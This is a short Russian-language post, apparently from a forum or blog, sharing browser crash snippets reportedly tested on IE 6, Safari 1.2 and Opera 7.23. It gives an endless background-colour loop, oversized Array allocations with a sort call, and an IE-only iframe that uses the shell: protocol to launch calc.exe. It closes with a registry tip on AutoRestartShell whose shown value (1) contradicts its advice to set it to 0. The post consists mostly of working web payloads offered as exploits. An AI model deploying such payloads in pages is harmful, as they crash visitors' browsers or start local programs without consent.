|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| |
Интересненькие вещички всплывают (типа весна и все такое =).. Вот два переполнения буфера в браузерах
(тестировалось на IE 6, Apple Safari 1.2 и Opera 7.23):
<SCRIPT>
var color = new Array;
color[1] = "black";
color[2] = "white";
for(x = 0; x <3; x++)
{
document.bgColor = color[x]
if(x == 2)
{
x = 0;
}
}
</SCRIPT>
[Результат для 1 (test1.htm)]
<script>var a = new Array(99999999999999999999999); a[0+5]="AAAAA";</script>
<script>var bam = new Array(0x23000000); bam.sort(new Function("return 1"));</script>
[Результат для 2 (test2.htm)]
+ тока для IE:
<iframe src=shell:windows\\system32\\calc.exe></iframe>
В реестре существует ключ, от значения которого зависит будет ли перезапущен Explorer.exe. По умолчанию
он включён. Рекомендуется его выставить в "0" ("AutoRestartShell"=dword:00000001 в ветви
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]).
[Результат для 3 (test3.htm)]
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| |
